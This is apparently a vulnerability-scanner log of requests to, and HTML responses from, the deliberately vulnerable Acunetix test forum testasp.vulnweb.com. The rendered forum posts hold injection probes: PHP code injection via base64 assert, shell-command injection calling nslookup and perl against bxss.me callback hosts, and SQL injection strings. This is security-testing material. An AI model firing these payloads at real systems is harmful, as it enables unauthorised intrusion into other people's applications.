Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3151 |
Response Body - size: 3,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>|(nslookup hitcsjqyrtmawb4020.bxss.me||perl -e "gethostbyname('hitcsjqyrtmawb4020.bxss.me')")</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>//xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3082 |
Response Body - size: 3,082 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>';print(md5(31337));$a='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3152 |
Response Body - size: 3,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>`(nslookup hitizikixkvrf2e498.bxss.me||perl -e "gethostbyname('hitizikixkvrf2e498.bxss.me')")`</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3074 |
Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>12345'"\'\");|]*</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers 